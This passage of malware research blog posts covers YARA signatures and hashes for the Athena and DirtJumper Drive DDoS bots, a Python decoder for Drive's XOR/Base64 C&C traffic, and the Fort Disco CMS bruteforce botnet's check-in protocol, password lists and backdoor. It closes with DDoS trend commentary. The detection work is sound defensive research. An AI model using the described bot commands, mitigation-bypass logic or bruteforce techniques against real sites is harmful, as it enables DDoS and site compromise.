    $cmd4 = "slowloris"
    $cmd5 = "rudy"
  condition:
    all of ($fmt_str*) and 3 of ($cmd*)
}
rule athena_irc {
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    description = "Athena IRC v1.8.x, 2.x identification"
  strings:
    $cmd1 = "ddos." fullword
    $cmd2 = "layer4." fullword
    $cmd3 = "war." fullword
    $cmd4 = "smartview" fullword
    $cmd5 = "ftp.upload" fullword
    $msg1 = "%s %s :%s LAYER4 Combo Flood: Stopped"
    $msg2 = "%s %s :%s IRC War: Flood started [Type: %s | Target: %s]"
    $msg3 = "%s %s :%s FTP Upload: Failed"
    $msg4 = "Athena v2"
    $msg5 = "%s %s :%s ECF Flood: Stopped [Total Connections: %ld | Rate: %ld Connections/Second]"
    // v1 strs
    $amsg1 = "ARME flood on %s/%s:%i for %i seconds [Host confirmed vulnerable"
    $amsg2 = " Rapid HTTP Combo flood on %s:%i for %i seconds"
    $amsg3 = "Began flood: %i connections every %i ms to %s:%i"
    $amsg4 = "IPKiller>Athena"
    $amsg5 = "Athena=Shit!"
    $amsg6 = "Athena-v1"
    $amsg7 = "BTC wallet.dat file found"
    $amsg8 = "MineCraft lastlogin file found"
    $amsg9 = "Process '%s' was found and scheduled for deletion upon next reboot"
    $amsg10 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
    // Athena-v1.8.3
    $amsg11 = "Rapid Connect/Disconnect"
    $amsg12 = "BTC wallet.dat found,"
    // v1 cmds
    $acmd1 = ":!arme"
    $acmd2 = ":!openurl"
    $acmd3 = ":!condis"
    $acmd4 = ":!httpcombo"
    $acmd5 = ":!urlblock"
    $acmd6 = ":!udp"
    $acmd7 = ":!btcwallet"
  condition:
    (all of ($cmd*) and 3 of ($msg*)) or (5 of ($amsg*) and 5 of ($acmd*))
}

Related MD5:

Athena IRC

3eb262817d8ab8a6f2282f0455c6ac03
859c2fec50ba1212dca9f00aa4a64ec4
0044e1e55b9524cc72b4060e5e84293d
cd962b1cfdfa6e3921adfc3750e95282
02214f425bf9c2c67d49e267bc4c84f6

Athena HTTP

2a8b26d216aea6fad8dd2297fd054413
e8bda57d4ca45cbe5d780a87e5052d0a
2d9f8082be96150b7f483ea5e863fcaa
7535a5ee124612cbaaf0e5a53b29158a
f1c083104fa4992e9f47a5b87e2c64f0

Introducing the Digital Attack Map

By: Dan Holden -

What our ATLAS data highlights is just how commonplace DDoS attacks have become – not only in terms of frequency, but also in terms of how many Internet users are impacted by DDoS. It’s not just a problem for large, global organizations and service providers; anyone with an Internet connection can be caught in the crossfire of an attack. The ‘collateral damage’ of an attack against a large organization or service provider falls on the people who rely on those networks every single day.

That’s why Google Ideas and Arbor have collaborated on a Digital Attack Map – a project we’re very excited to announce today.


The Digital Attack Map utilizes anonymous traffic data from our ATLAS® threat monitoring system to create a data visualization that allows users to explore historical trends in DDoS attacks, and to make the connection to related news events on any given day. The data is updated daily, and historical data can be viewed for all geographies.  This collaboration brings life to the ATLAS data we leverage every day to uncover new attack trends and techniques, sharing it in a visual way that connects the dots between current events and cyberattacks taking place all over the world.

We invite you to explore the Digital Attack Map to see for yourself how DDoS has become a global threat to the availability of networks, applications and services that billions of people rely on every day.

DirtJumper Drive Shifts into a New Gear

By: Jason Jones -

The last time I wrote about Drive, it was still following the old model of DirtJumper-variant phone-homes and all the communications were in plaintext. I recently discovered a new variant that diverges from the DirtJumper-variant phone-home and adds a number of new attacks, including one it calls -smart that attempts to bypass some known mitigation techniques. This appears to be one of the first pieces of DDoS malware that attempts to detect the mitigations being used and bypass them.

Introduction

This version proved slightly more difficult to reverse than the first version with IDR not recognizing many of the standard Delphi library functions – possibly due to the Delphi version – when it was generating the IDC script to load into IDA Pro. Additionally, the first sample analyzed caused IDA Pro numerous problems, including failing to recognize local variables, but subsequent samples did not have those issues. Thankfully, BinDiff was useful when comparing against my IDB of the original version to identify both the Delphi library functions and all of my existing tagged global variables and previously reversed functions. Using that, the new command encoding became much easier to find. A yara rule to identify this version is below and is also in the ASERT Github repository:

rule dirtjumper_drive2
{
 strings:
   $cmd1 = "-get" fullword
   $cmd2 = "-ip" fullword
   $cmd3 = "-ip2" fullword
   $cmd4 = "-post1" fullword
   $cmd5 = "-post2" fullword
   $cmd6 = "-udp" fullword
   $str1 = "login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]"
   $str2 = "-timeout" fullword
   $str3 = "-thread" fullword
   $str4 = " Local; ru) Presto/2.10.289 Version/"
   $str5 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT"
   $newver1 = "-icmp"
   $newver2 = "-byte"
   $newver3 = "-long"
   $newver4 = "<xmp>"
 condition:
   4 of ($cmd*) and all of ($str*) and all of ($newver*)
}

Attack Command Structure Change

The old style of DirtJumper and Drive phone-home was a simple POST request with a single parameter named k that was either 15 or 34 bytes long. This new version renames k to req and still uses a 15-byte bot identifier. Along with this change, there is now another, different POST request that has been observed to both precede and follow the request for targets from the server. This request sends a hard-coded string – newd=1 – as the POST data, and what is returned appears to be a list of backup URLs to use in the event that the main CnC server goes down.

The string encoding detailed in the previous post still holds for all strings except the CnC information. Previously, the CnC host and URI were specified as separate strings, but they are now specified as a full URL that uses the same encoding method as the attack commands from the CnC. First, the information is XOR-encoded with a static key (in all samples seen so far, “okokokjjk” is the XOR key used) and then it is Base64-encoded. I did manage to waste a couple of hours reversing their slightly abnormal Base64 decoder, only to verify that it was indeed a standard Base64 decoder. Given that all the CnCs are specified in URL format, and all of the URLs so far start with http://, it is possible to determine the first 7 bytes of the XOR key without running the sample or searching for the key. Once the sample is run, the rest of the XOR key can easily be found. An example function to decode messages sent from the CnC is below:

 

import base64

def decode_comms(message, key='okokokjjk'):
    # base64-decode, then XOR with the repeating static key (Python 3:
    # b64decode returns bytes, so each element is already an int)
    message = base64.b64decode(message)
    decoded_message = ""
    for i in range(len(message)):
        decoded_message += chr(message[i] ^ ord(key[i % len(key)]))
    return decoded_message
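The known-plaintext trick mentioned above – every CnC URL begins with http:// – also means the key prefix falls out of a single XOR. A sketch of that recovery step (again, an illustration rather than the tooling used in the analysis):

```python
import base64

def recover_key_prefix(b64_ciphertext, known_prefix=b"http://"):
    # XORing the ciphertext bytes against the known plaintext prefix
    # reveals the corresponding leading bytes of the XOR key.
    ct = base64.b64decode(b64_ciphertext)
    return bytes(c ^ p for c, p in zip(ct, known_prefix)).decode()
```

Running the sample then exposes longer plaintexts, from which the remaining key bytes can be read off the same way.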

 

An example response from a server might look something like:

28
QhgCCh0fSgIfGxtVREAcHR1FChMOBh8HD0QIAAZA
0

where 0x28 is the length of the message, which when decoded looks the same as in the first version:

-smart hxxp://www.example.com/

 

New Attacks

The new variant has four new attacks: -icmp, -byte, -long, and -smart. Of these, the most interesting is the -smart attack, which attempts to incorporate some DDoS mitigation bypass techniques – the first piece of DDoS malware that ASERT has seen attempt to do this. The least interesting is the -icmp attack, which sends a standard ICMP echo request towards the target host.

There was also one new option added to the existing attacks in this version: a -cookie parameter where the attacker can choose to specify a specific or randomly generated cookie value with the attack.

Byte and Long

The -byte attack looks to be a variant of the previously discussed -ip and -ip2 attacks, where only one random lowercase alpha byte is sent before the socket is closed instead of the other payloads. It is not clear what the purpose of such an attack is, as it has only been witnessed targeting port 80, and the existing -ip attack already allows for sending small payloads.

Drive2 Byte Attack ASM Code

The -long attack is more interesting and, as its name implies, attempts to keep a socket open for a long period of time while also sending a decent amount of data. A random payload is generated and sent, and then the bot sleeps randomly for 2 to 6 seconds before repeating the send, up to 10240 times. It seems unlikely that this attack will run for the maximum duration, as most services will close a socket upon receiving data that is malformed for their protocol, but it is possible some will not, allowing the attack to continue long enough to exhaust available connections.

Smart Attack

The -smart attack has only been seen in one sample so far and has been observed when attacks were ordered against sites. The attack sends an initial attack packet and then looks for either a Set-Cookie or a Location header, parsing out the cookie value or new URL location and using those values in the next packet it sends. It will also look for a meta refresh tag, location= or document.location.href inside the response from the server, in an attempt to defeat mitigations using those countermeasures as well.

This is one of, if not the, first pieces of DDoS malware that ASERT has seen actively attempt to defeat known mitigation techniques.

When parsing out the Set-Cookie header, there are a lot of convoluted calls to @LStrPos and @LStrLen as it searches for the relevant parts of the cookie value. Once all that is sorted, it stores the cookie value in the attack’s global cookie array, making it available to all subsequent requests sent to the server as part of the attack. The other parsing mechanisms behave similarly with respect to redirects – they store the new location in a global variable so that the next time the attack runs, it targets the proper path. The bot also checks for the presence of these mitigation responses each time a request is sent. While this adds some overhead, it ensures that the attack packets have a high chance of getting through.
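The header-scraping logic described above amounts to something like the following – a simplified Python rendering for clarity, not a translation of the bot's actual Delphi code:

```python
def extract_bypass_values(response):
    # Pull the cookie value out of Set-Cookie and the redirect target out of
    # Location; the bot stores these globally and replays them in the next
    # attack request to slip past cookie/redirect-based mitigations.
    cookie = location = None
    for line in response.split("\r\n"):
        lower = line.lower()
        if lower.startswith("set-cookie:"):
            cookie = line.split(":", 1)[1].strip().split(";")[0]
        elif lower.startswith("location:"):
            location = line.split(":", 1)[1].strip()
    return cookie, location
```

As noted later, an endpoint that controls these response fields can feed the parser crafted values, which is one of the implementation weaknesses that can be turned against the attack.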

After parsing out the appropriate value to bypass, the attack will build a new HTTP request to send and also generate a new random User-Agent that will be used in the new attack. The assembly code for this can be seen below in Figure 2. There are some weaknesses in the implementation of the parsing sections of this attack that can be manipulated by an endpoint as well.

Drive2 Bypass Request Construction

Conclusion

Just as the first version of Drive raised the bar for DirtJumper variants, this version looks to be raising the bar for DDoS malware in general with its purposeful attempts at bypassing mitigations with its new -smart attack.  We expect that this is just the first of many pieces of malware to attempt to incorporate these bypass techniques and also expect that Drive will continue to evolve and attempt to improve its techniques for such bypass attacks.

Related md5: fd94080ea9aa6e69f46f59b87a4fba88

Fort Disco Bruteforce Campaign

By: Matthew Bing -

In recent months, several researchers have highlighted an uptick in bruteforce password guessing attacks targeting blogging and content management systems. Arbor ASERT has been tracking a campaign we are calling Fort Disco that began in late May 2013 and is continuing. We’ve identified six related command-and-control (C&C) sites that control a botnet of over 25,000 infected Windows machines. To date, over 6,000 Joomla, WordPress, and Datalife Engine installations have been the victims of password guessing.

Background

Understanding an attack campaign by only analyzing a malware executable file is a Sisyphean task. The malware alone can be picked apart by disassemblers, poked and prodded in a sandbox, but by itself offers no clues into the size, scope, motivation, and impact of the attack campaign. It’s much like a historian finding a discarded weapon on an ancient battlefield. Several things can be inferred, but painting a complete picture is difficult.

Researchers have several techniques at their disposal to gauge the size of a botnet. They can sinkhole discarded domains or monitor traffic to live attack sites to observe infected hosts checking in to a C&C site. In rare instances, the controller of a botnet may inadvertently leave clues publicly accessible for anyone to observe.


The controller of the campaign we call Fort Disco, named after one of the strings found in the PE metadata field, inadvertently left publicly accessible log files that lay out a complete picture of the campaign. There are six C&C sites that we believe are related. The sites either share a subdomain or are co-hosted with each other, and have similar structures.

Windows Malware

There are at least four variants of the Windows malware related to the Fort Disco campaign. A newly infected machine registers with the C&C site hardcoded into the malware:

> POST /cmd.php HTTP/1.0
>
> status=0

The malware then checks in to receive commands:

> GET /cmd.php HTTP/1.0
< 1
< 30
< http://[xxx]/10823.txt
< qazxsw
< 480

The command structure can vary, but the important commands are the third and fourth lines. The third line is a URL of a list of sites to attack. We’ve observed the target list being anywhere from 5,000 to 10,000 sites at a time. The C&C tends to give out the same list to multiple infections.

The fourth line is the password to use, and in some cases can be a URL to a password list. What’s particularly interesting about this bruteforce list is that it supports the dynamic values {domain} and {zone}. These values are replaced with the target’s domain name and top-level zone, respectively. For instance, if the malware were targeting a blog at www.example.com and was configured to use “{domain}” as a password, the malware would attempt logging in with the password “example”. We’ve observed password lists containing anywhere from 150 to 1,000 entries.
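The {domain}/{zone} substitution can be illustrated with a short sketch. The domain parsing here is a naive assumption for demonstration; the malware's exact parsing logic is unknown:

```python
def expand_templates(entries, target):
    # For "www.example.com": {domain} -> "example", {zone} -> "com"
    # (naive dot-split; proper registrable-domain parsing would need a
    # public-suffix list)
    parts = target.split(".")
    domain = parts[-2] if len(parts) >= 2 else target
    zone = parts[-1]
    return [e.replace("{domain}", domain).replace("{zone}", zone)
            for e in entries]
```

This is why "{domain}" appears among the top passwords in the table further below: many site owners simply reuse their own domain name.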

The malware also has a hardcoded URL pointing to a list of usernames. The list is small, anywhere from one to five entries, and usually consists of “admin” or “administrator”. The login names support {domain} values as well.

The malware attempts to log in to the target list with combinations of the supplied usernames and passwords. Successful username/password combinations are reported back to the C&C by posting to the file /bruteres.php. Results are appended to a text file publicly accessible via the web.


It’s unclear exactly how the malware gets installed. We found a reference to the malware’s original filename (maykl_lyuis_bolshaya_igra_na_ponizhenie.exe), a Russian rendering of Michael Lewis’ book “The Big Short: Inside The Doomsday Machine”, delivered as an executable attachment. Another filename, proxycap_crack.exe, refers to a crack for the ProxyCap program. It’s unclear if victims were enticed to run these files, and if so, whether that is the only means of infection. The C&C sites did not offer additional clues as to the infection mechanism.


 

Activity to the C&C sites continues. The above chart, from Umbrella Security Graph’s passive DNS data, shows regular and continuing requests for this particular C&C domain name.

The log files found on the C&C sites included the IP addresses of victims. Some level of skepticism is required, since we are analyzing data that could have been altered by the attacker. We found 25,611 unique IP addresses connecting to the six C&C sites. Mitigating factors such as double-counting infections behind a NAT, and infected machines changing IP addresses may affect the final tally.

The top three countries with infections are the Philippines, Peru, and Mexico. Interestingly, it seems the United States and Western Europe are underrepresented. For an interactive map showing infected clients, click here.

Compromised Sites

Continuing to analyze the logs recovered from the C&C, we were able to compile a list of usernames and passwords for 6,127 sites.  Only three types of platforms were targeted: Joomla (/administrator/index.php), WordPress (/wp-login.php), and Datalife Engine (/admin.php).



The attacker chooses the sites to attack, which, based on the top ten top-level domains where usernames and passwords are listed, appear to favor Russia:

Top-Level Domain Number
RU 2582
COM 1601
UA 348
NET 329
ORG 254
INFO 110
KZ 99
US 84
BY 76
xn--p1ai 65

The top ten passwords for these sites seem to indicate that these are targets of opportunity, as these passwords are the “weakest of the weak”.

Password Number
admin 893
123456 588
123123 371
12345 360
{domain} 248
pass 218
123456789 171
1234 150
abc123 136
123321 131

 

With the compromised credentials, the commander of the botnet also installed a variant of the “FilesMan” PHP backdoor on to 788 of the sites. This password-protected backdoor allows the attacker to browse the filesystem, upload or download files, and execute commands.

The ultimate intent of the campaign remains unclear. On several compromised sites we found two tools:

• A simple PHP-based redirector that sends browsers running Windows with either “MSIE”, “Firefox”, or “Opera” in the User-Agent to a website through several more layers of redirection ultimately landing on a Styx exploit kit.
• A WordPress plugin and supporting library to import posts from a Tumblr blog.

We were not able to find any evidence that the tools were actually used, but based on their nature, we can speculate that the intent of the attacker is to serve exploit kits on these compromised sites.

Attribution

There are several clues that lead us to believe the owner is based in a post-Soviet state:

• The majority of the sites targeted are in Russia or the Ukraine.
• All of the C&C sites are hosted in Russia or the Ukraine.
• A Russian error string was found on several C&C sites. “Не могу подключиться к базе данных!”, which translates to “Unable to connect to database!”
• Although this appears to be the default, the character set of the FilesMan backdoor is set to “Windows-1251”, or the Cyrillic code page.
• The Datalife Engine platform appears to be popular in Russia.

Conclusion

Beginning with the Brobot attacks in early 2013, we’ve seen attackers focus on targeting blogs and content management systems. This marks a tactical shift toward exploiting weak passwords and out-of-date software on popular platforms. By uploading a PHP shell to compromised sites, an attacker can easily issue commands to thousands of compromised sites in seconds.

Blogs and CMSs tend to be hosted in data centers with immense network bandwidth. Compromising multiple sites gives the attacker access to their combined bandwidth, much more powerful than a similarly sized botnet of home computers with limited network access. While we have no evidence the Fort Disco campaign is related to Brobot or to denial-of-service activity, we’ve experienced the threat that a large blog botnet can deliver.

Related MD5 Hashes

722a1809bd4fd75743083f3577e1e6a4
750708867e9ff30c6b706b7f86eb67b5
976f77d6546eb641950ef49a943449f1
062dae6ee87999552eae4bb37cdec5d4
7931709fd9b84bbb1775afa2f9dff13a
9b8b185ce66b6887cc19149258ba1d1b

Lessons learned from the U.S. financial services DDoS attacks

By: Arbor Networks -

By Dan Holden and Curt Wilson of Arbor’s Security Engineering & Response Team (ASERT)

During the months of September and October we witnessed targeted and very serious DDoS attacks against U.S. based financial institutions. They were very much premeditated, focused, advertised before the fact, and executed to the letter.

In the case of the September 2012 DDoS attack series, many compromised PHP Web applications were used as bots in the attacks. Additionally, many WordPress sites, often using the out-of-date TimThumb plugin, were being compromised around the same time. Joomla and other PHP-based applications were also compromised. Unmaintained sites running out-of-date extensions are easy targets and the attackers took full advantage of this to upload various PHP webshells which were then used to further deploy attack tools. Attackers connect to the compromised webservers hosting the tools directly or through intermediate servers/proxies/scripts and issue attack commands. In the September 2012 attacks there were several PHP based tools used, the most prominent of which was “Brobot” along with two other tools, KamiKaze and AMOS which were used a bit less often.  Brobot has also been referred to as “itsoknoproblembro”.

The attack tactics observed were a mix of application-layer attacks on HTTP, HTTPS and DNS, with volumetric attack traffic on a variety of TCP, UDP, ICMP and other IP protocols. The other obvious and uncommon factor at play was the launch of simultaneous attacks, at high bandwidth, against multiple companies in the same vertical.

On December 10, 2012, the group claiming responsibility for the prior attacks, the Izz ad-Din al-Qassam Cyber Fighters, announced “Phase 2 Operation Ababil”. A new wave of attacks was announced on their Pastebin page, which described their targets as follows:

“Continually, the goals under attacks of this week are including: U.S. Bancorp, JPMorgan Chase&co, Bank of America, PNC Financial Services Group, SunTrust Banks, Inc.”

On December 11, 2012, attacks on several of these victims were observed. Some attacks looked similar in construction to Brobot v1; however, Brobot v2 includes a newly crafted DNS packet attack and a few other changes.

These attacks have shown why DDoS continues to be such a popular and effective attack vector. Yes, DDoS can take the form of very large attacks. In fact, some of this week’s attacks have been as large as 60Gbps. What makes these attacks so significant is not their size, but the fact that the attacks are quite focused, part of an ongoing campaign, and like most DDoS attacks quite public. These attacks utilize multiple targets, from network infrastructure to Web applications.

Lessons Learned

While there has been much speculation about who is behind these attacks, our focus is less on the who or why, but how we can successfully defend. There are multiple lessons to be learned from these attacks, by everyone involved – the targeted enterprises, their managed security providers, Website and Web application administrators, and the vendor community.

For enterprises, it is clear that typical perimeter defenses such as firewalls and IPS are not effective when dealing with DDoS attacks, as each technology inline to the target is actually a potential bottleneck. These devices can be an important part of a layered defense strategy, but they were built for problems far different from today’s complex DDoS threat. Given the complexity of today’s threat landscape and the nature of application-layer attacks, it is increasingly clear that enterprises need better visibility and control over their networks, which requires a purpose-built, on-premise DDoS mitigation solution. This could sound self-serving; however, visibility into a DDoS attack needs to be far better than the first report of your Website or critical business asset going down. Without real-time knowledge of the attack, defense and recovery become increasingly difficult.

Providers of managed security services have begun to evaluate their deployments and mitigation capacity. These attacks were unique in that they targeted multiple organizations within the same vertical, putting a strain on the capacity of providers’ cloud-based mitigation services.

What these attacks have continued to demonstrate is that DDoS will remain a popular and increasingly complex attack vector. DDoS is no longer simply a network issue, but is increasingly a feature or additional aspect of other threats. The motivation of modern attackers can be singular, but the threat landscape continues to become more complex, mixing various threats to increase the likelihood of success. There have certainly been cases where the MSSP was successful at mitigating an attack but the target Website still went down due to corruption of the underlying application and data. In order to defend networks today, enterprises need to deploy DDoS security in multiple layers, from the perimeter of their network to the provider cloud, and ensure that on-premise equipment can work in harmony with provider networks for effective and robust attack mitigation.

 

Syria goes dark

By: Darren Anstee -

UPDATE: Syria’s back online

 

ORIGINAL POST

The ATLAS infrastructure leverages Arbor Networks’ world-wide service provider customer base to gather data about Internet traffic patterns and threats.  Currently 246 of Arbor’s customers are actively participating in the ATLAS program, and are sharing data on an hourly basis.

The data shared includes information on the traffic crossing the boundaries of participating networks, and the kinds of DDoS attacks they are seeing. The graph below shows the cumulative total traffic (to/from Syria) across all of these participating networks. This does not show the total traffic into and out of Syria; it is simply a snapshot taken from the vantage point of 246 network operators around the world. As you can see, traffic drops to virtually nothing earlier today. The actual traffic interruption is likely to have occurred between 1000 and 1100 today; the graphs show the interruption an hour later than this due to the variable, hourly reporting from ATLAS participants to our servers.

(UPDATED: as of 5:50am ET on 12/1/12)

 

As a reminder, this is not the first time we have seen a complete cutoff of Internet access in the Middle East. You may recall that back in January 2011, something similar occurred in Egypt.

 

How likely is a DDoS Armageddon attack?

By: Carlos Morales -

The recent DDoS attacks against many of the North American financial firms had some unique characteristics that put a strain on the defenses in place and resulted in a number of well-publicized service outages. The escalating threat is not new. It has been steadily building over the last few years as botnet command and control has matured, the tools available to exploit those botnets have gone mainstream, and the cost of using those tools has plummeted. What the attacks did do is raise the industry’s collective consciousness around how bad the situation has gotten. The effectiveness of the attacks has changed the way that Internet operators – whether service provider, hosting provider, government or enterprise – think about their defenses. It has also raised a number of troubling questions.

The most common question I have been asked concerns the growing size of attacks and the capacity of Internet operators to withstand such threats. How big does an attack have to be to overwhelm the biggest, most prepared financial company? How big does an attack have to be to overwhelm the biggest and most prepared service provider? Is there an Armageddon attack on the horizon that threatens to take down the entire Internet? There are indications that this could be the case.

It should be noted that size is by no means the only way an attack can be effective. It is simply a very visible way of taking down a network, much as a seven-mile backup on a local highway is a visible sign that you are not getting to your destination quickly. Application-layer attacks, IP protocol attacks, connection attacks, and other stealthy attack methods can be just as effective at taking down a victim while being much more difficult to detect and mitigate. The financial-sector attacks were multi-vector, with aspects of both volumetric and application-layer attack traffic.

This article focuses on larger attacks and the possibility of an Armageddon attack. First, there are a few different measures of size, including bandwidth (bits per second, bps), packets (packets per second, pps), and connections (connections per second, cps). In all three cases, Internet operators such as enterprises have a limit they can handle. Bps is the most commonly considered measure of size, and it is easy to estimate network bandwidth limits: if the operator has 10 Gbps of upstream bandwidth, then attacks bigger than this will overwhelm the links. Pps limits are more of a challenge to estimate because each device in-line with traffic has its own pps limits, which depend on its configuration and the type of traffic seen. High-pps attacks often cause more problems than high-bps attacks because multiple bottlenecks may exist on the network. High-cps attacks are typically targeted at stateful devices on the network that maintain a connection table. These tend to be the hardest to measure because network traffic analyzers tend to focus on just bps or pps.
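The three bottlenecks above can be sketched as a simple capacity check. This is a hypothetical illustration; the capacity and attack figures below are made-up assumptions, not measurements from any real network:

```python
# Hypothetical sketch: a network has separate ceilings for bandwidth (bps),
# packets (pps), and connections (cps), and an attack can exhaust any one
# of them independently. All numbers here are illustrative assumptions.

def exceeded_limits(attack, capacity):
    """Return the list of dimensions where the attack exceeds capacity."""
    return [dim for dim in attack if attack[dim] > capacity[dim]]

# Assumed 10 Gbps datacenter, with notional pps/cps ceilings on in-line devices.
capacity = {"bps": 10e9, "pps": 15e6, "cps": 200e3}

# An attack well under the bandwidth limit can still overrun the pps ceiling.
attack = {"bps": 4e9, "pps": 20e6, "cps": 50e3}

print(exceeded_limits(attack, capacity))  # ['pps']
```

The point of the sketch is that a defender who monitors only bps would see this attack as comfortably within capacity while in-line devices are already dropping packets.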

With all three attack types, all enterprise, government, and hosting-provider networks have bottlenecks that can be overrun relatively easily by big DDoS attacks. Most enterprise and government datacenters have no more than 10 Gbps of upstream capacity, with some ranging slightly higher. Arbor Networks frequently sees attacks much larger than this. As an example, Arbor's ATLAS system receives anonymous attack statistics from hundreds of Arbor Peakflow SP deployments. The largest bandwidth attacks measured in 2011 and 2012 were 101.4 Gbps and 100.8 Gbps, respectively; the largest packet-per-second attacks were 139.7 Mpps and 82.4 Mpps, respectively. Another source of data is the annual security survey of Internet operators that Arbor runs. One of the survey questions asks about the largest bps attacks seen over the previous year. The chart below reflects the biggest attacks reported each year since the survey was first conducted in 2002.

Based on the data from the chart above, there have been DDoS attacks capable of overwhelming a 10 Gbps datacenter since 2005. All this means that enterprises, governments, and hosting providers need help from their upstream service providers to deal with threats of this magnitude. Many of these providers offer managed security services that provide protection against bigger attacks. At a certain point, the attacks are big enough that the providers consider them their own responsibility anyway, because of the potential impact on multiple customers. However, it is strongly recommended to have an agreement in place to ensure SLAs and guaranteed response times.

That brings me back to the question of whether an Armageddon attack is possible that can overwhelm not only the end victim but also all the Internet providers in between. Based on the current Internet environment, this is all too possible. The first thing to consider is the available bandwidth for generating an attack. Botnets have been discovered that contained more than 1M infected hosts. Assuming an average of 1 Mbps of upstream access per host, a conservative estimate based on the number of broadband, 4G, and 3G subscribers in the world, a 1M-host botnet could generate an attack of 1 Tbps. Now what if this botnet and multiple other large botnets attacked at the same time? Service providers have a lot of bandwidth throughout their networks, but there are limits to how much traffic they can handle. Attacks of the magnitude described would have a profound effect on the Internet as a whole, exploiting bottlenecks in many places simultaneously. No single service provider, even the largest Tier 1s, could handle all this traffic without adversely affecting its user base.
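The back-of-the-envelope arithmetic above can be written out explicitly. The host count and per-host upstream figure come from the paragraph itself; everything else is just unit conversion:

```python
# Worked version of the estimate in the text: a 1M-host botnet,
# each bot with a conservative 1 Mbps of upstream bandwidth.
hosts = 1_000_000           # infected hosts in a large discovered botnet
upstream_bps = 1_000_000    # 1 Mbps upstream per host (conservative)

aggregate_bps = hosts * upstream_bps
print(aggregate_bps / 1e12, "Tbps")  # 1.0 Tbps
```

Scaling the same arithmetic to several such botnets attacking simultaneously is what produces the multi-terabit scenario no single provider could absorb.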

Is this possible? It certainly seems so. Is it likely? It does not seem so, since it would affect everyone on the Internet and not just a single victim. That said, many attacks that did not seem likely before are now becoming commonplace as motivations have shifted. It is something that CSOs within the carrier community are likely considering, and hopefully they are taking steps to plan for the worst.

 
